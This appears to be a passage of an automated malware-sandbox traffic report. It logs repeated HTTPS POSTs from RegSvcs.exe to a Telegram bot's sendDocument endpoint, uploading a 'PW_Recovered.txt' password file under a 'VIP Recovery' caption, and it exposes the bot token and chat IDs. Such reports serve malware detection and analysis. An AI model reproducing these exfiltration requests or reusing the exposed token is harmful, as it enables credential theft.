                                                                          2024-09-19 10:23:46 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12803,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          78192.168.2.561631149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:46 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf0c0ffc60fd2
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:46 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 63 30 66 66 63 36 30 66 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf0c0ffc60fd2Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:46 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:46 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:46 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12804,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          79192.168.2.561634149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:49 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf2d6cd89f323
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:49 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 64 36 63 64 38 39 66 33 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf2d6cd89f323Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:49 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:49 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:49 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12805,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          80192.168.2.561636149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:50 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf5228736b7e4
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:50 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 32 32 38 37 33 36 62 37 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf5228736b7e4Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:50 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:50 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:50 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12806,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          81192.168.2.561637149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:50 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf5262a282ce3
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:50 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 32 36 32 61 32 38 32 63 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf5262a282ce3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:50 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:50 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:50 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12807,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          82192.168.2.561640149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:54 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf5efb3c6be30
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:54 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 66 62 33 63 36 62 65 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf5efb3c6be30Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:54 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:54 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:54 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12808,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          83192.168.2.561641149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:54 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf5adc4041a3c
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:54 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 61 64 63 34 30 34 31 61 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf5adc4041a3cContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:55 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:55 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:55 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12810,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          84192.168.2.561644149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:59 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf68d694733eb
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:59 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 38 64 36 39 34 37 33 33 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf68d694733ebContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:59 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:59 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
